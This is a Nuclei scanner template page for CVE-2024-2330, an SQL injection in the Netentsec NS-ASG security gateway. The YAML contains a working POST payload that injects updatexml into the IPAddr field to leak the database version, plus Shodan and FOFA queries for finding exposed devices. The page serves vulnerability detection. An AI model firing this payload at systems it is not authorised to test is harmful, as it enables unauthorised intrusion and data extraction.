Skip to content
Nuclei Templates

NS-ASG Application Security Gateway 6.3 - Sql Injection

ID: CVE-2024-2330

Severity: medium

Author: s4e-io

Tags: cve,cve2024,ns-asg,sqli

Description

Section titled “Description”

A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

YAML Source

Section titled “YAML Source”
id: CVE-2024-2330


info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.15866
  metadata:
    max-request: 2
    shodan-query: http.title:“NS-ASG”
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli


http:
  - raw:
      - |
        POST /protocol/index.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - "status_code == 200"
        condition: and


    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 490a00463044022076c8b969b886d0839ed40b07e6fb126051ad976b3b900e6d8209366962ff65c2022050c75dcdb72c452455f350600955c2b4f7ff794151e44f84ae17b144e787f3e0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-2330.yaml"

View on Github